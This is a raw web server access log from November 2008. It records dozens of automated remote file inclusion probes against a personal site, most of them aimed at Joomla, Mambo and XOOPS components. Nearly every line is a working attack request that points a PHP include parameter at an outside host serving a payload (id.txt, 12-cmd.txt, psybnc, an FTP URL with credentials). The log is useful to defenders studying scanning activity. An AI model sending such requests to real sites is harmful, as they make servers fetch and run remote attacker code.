219.94.174.158 - - [04/Nov/2008:11:52:37 -0800] "GET /logs/access_080329.log//index.php?option=http://rubi4.freehostia.com/roxx.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:52:37 -0800] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:52:37 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:52:37 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.79.51.225 - - [04/Nov/2008:11:52:46 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:53:03 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:53:03 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:53:03 -0800] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:53:05 -0800] "GET /logs/access_080320.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:11:53:12 -0800] "GET /logs/access_080718.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:53:22 -0800] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:53:22 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:53:23 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 50 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:20 -0800] "GET /logs/access_080509.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:54:20 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:54:20 -0800] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:54:20 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.248.13 - - [04/Nov/2008:11:54:20 -0800] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:24 -0800] "GET /admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:24 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:24 -0800] "GET /logs/access_080508.log//admin/business_inc/saveserver.php?thisdir=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:54:34 -0800] "GET /logs/access_080303.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
209.200.250.80 - - [04/Nov/2008:11:54:34 -0800] "GET /logs/access_080201.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:40 -0800] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:40 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:40 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:11:54:40 -0800] "GET /logs/access_080602.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:11:55:10 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:11:55:11 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:11:56:04 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 200 94891 "-" "libwww-perl/5.76" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:56:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:56:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:11:56:13 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.43.246.153 - - [04/Nov/2008:11:56:49 -0800] "GET /index.php?pagina=http://www.xdxisde.xpg.com.br/dn.txt?] HTTP/1.1" 200 94667 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
66.249.67.57 - - [04/Nov/2008:11:57:00 -0800] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "-" "Googlebot-Image/1.0" "dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:58:07 -0800] "GET /logs//common/db.php?commonpath=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:58:07 -0800] "GET /common/db.php?commonpath=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:58:07 -0800] "GET /logs/access_080928.log//common/db.php?commonpath=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:11:58:20 -0800] "GET /logs/access_080326.log//common/db.php?commonpath=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.130.198.38 - - [04/Nov/2008:11:58:31 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [04/Nov/2008:11:58:31 -0800] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.130.198.38 - - [04/Nov/2008:11:58:31 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://billing.webcity.co.uk/~date/cc/id.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:11:58:40 -0800] "GET /logs/access_080126.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:11:58:41 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:11:58:41 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:11:58:56 -0800] "GET /logs/access_080225.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:00:08 -0800] "GET /components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:00:08 -0800] "GET /components/com_mosmedia/media.divs.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.159.100 - - [04/Nov/2008:12:00:09 -0800] "GET /logs/access_080925.log%20/index.php?_REQUEST=&_REQUEST[option]=com_poll&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:12:01:25 -0800] "GET /logs/access_080416.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:12:01:25 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:12:01:25 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.205.97.26 - - [04/Nov/2008:12:01:25 -0800] "GET /logs/access_080505.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:43 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:43 -0800] "GET /phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:45 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:46 -0800] "GET /phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:46 -0800] "GET /logs/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:01:46 -0800] "GET /logs/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.131.37.238 - - [04/Nov/2008:12:01:49 -0800] "GET /blog/wp-rss2.php HTTP/1.0" 200 657 "-" "YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users 0; views 0)" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:02:15 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:02:16 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:03:28 -0800] "GET /newspublish/include.php?path%5Bdocroot%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:03:28 -0800] "GET /logs/access_080304.log//newspublish/include.php?path%5Bdocroot%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:03:28 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:03:28 -0800] "GET /logs/access_080430.log//newspublish/include.php?path%5Bdocroot%5D=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:03:41 -0800] "GET /logs/access_081004.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:03:44 -0800] "GET /logs/access_081004.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:03:45 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:03:45 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.57.157.28 - - [04/Nov/2008:12:03:46 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:12:04:08 -0800] "GET /logs//index.php?config=1&base_datapath=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
210.116.103.35 - - [04/Nov/2008:12:04:10 -0800] "GET /index.php?config=1&base_datapath=http://www.contactosteune.com/poll/psybnc??? HTTP/1.1" 200 94878 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.22.110.198 - - [04/Nov/2008:12:04:45 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://teleurstelling.com/images/avatars/94534189346cefc8bdc08c.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.198 - - [04/Nov/2008:12:04:46 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://teleurstelling.com/images/avatars/94534189346cefc8bdc08c.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.198 - - [04/Nov/2008:12:04:47 -0800] "GET /logs/access_080116.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://teleurstelling.com/images/avatars/94534189346cefc8bdc08c.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.22.110.198 - - [04/Nov/2008:12:04:53 -0800] "GET /logs/access_080401.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://teleurstelling.com/images/avatars/94534189346cefc8bdc08c.jpg???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.123.186 - - [04/Nov/2008:12:06:04 -0800] "GET /logs/access_080925.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:06:13 -0800] "GET /logs/access_080811.log/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:06:13 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.19.188 - - [04/Nov/2008:12:06:14 -0800] "GET /logs/administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://www.italy-villa-rental.info/dirscan/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:07:07 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:07:07 -0800] "GET /phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:07:09 -0800] "GET /logs/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.163.191.198 - - [04/Nov/2008:12:07:15 -0800] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.7.217 - - [04/Nov/2008:12:09:26 -0800] "GET /calendar/myevent.php?myevent_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:12:10:27 -0800] "GET /logs/access_080725.log//index.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:12:10:28 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
87.230.0.240 - - [04/Nov/2008:12:10:53 -0800] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.parcornithologique.com//forum/forums/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.202.123.186 - - [04/Nov/2008:12:10:55 -0800] "GET /logs/access_080919.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.lsd.hu/uploads/qATcxfJrqynXqTqlsmbO/content? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:12:11:27 -0800] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:12:11:27 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:12:11:27 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [04/Nov/2008:12:11:27 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.geocities.com/kamtiez_family2000/kontol.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:12:11:32 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:12:11:32 -0800] "GET /logs/access_080207.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:12:11:32 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
66.40.52.30 - - [04/Nov/2008:12:11:36 -0800] "GET /logs/access_080727.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:12:06 -0800] "GET /logs/access_080209.log/index.php?lang=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:12:06 -0800] "GET /logs/index.php?lang=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
200.85.32.31 - - [04/Nov/2008:12:12:10 -0800] "GET /index.php?lang=http://maurinho.t35.com/idfeel.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
201.41.39.74 - - [04/Nov/2008:12:12:34 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=ftp://upload:test@195.137.212.241/ids.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:12:12:39 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:12:12:39 -0800] "GET /errors.php?error=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.94.108.111 - - [04/Nov/2008:12:12:40 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.gosgo.com/bbs/idxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
78.13.48.145 - - [04/Nov/2008:12:13:18 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:13:40 -0800] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:13:40 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.226.217.113 - - [04/Nov/2008:12:13:40 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://usuarios.lycos.es/qweqwe12/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
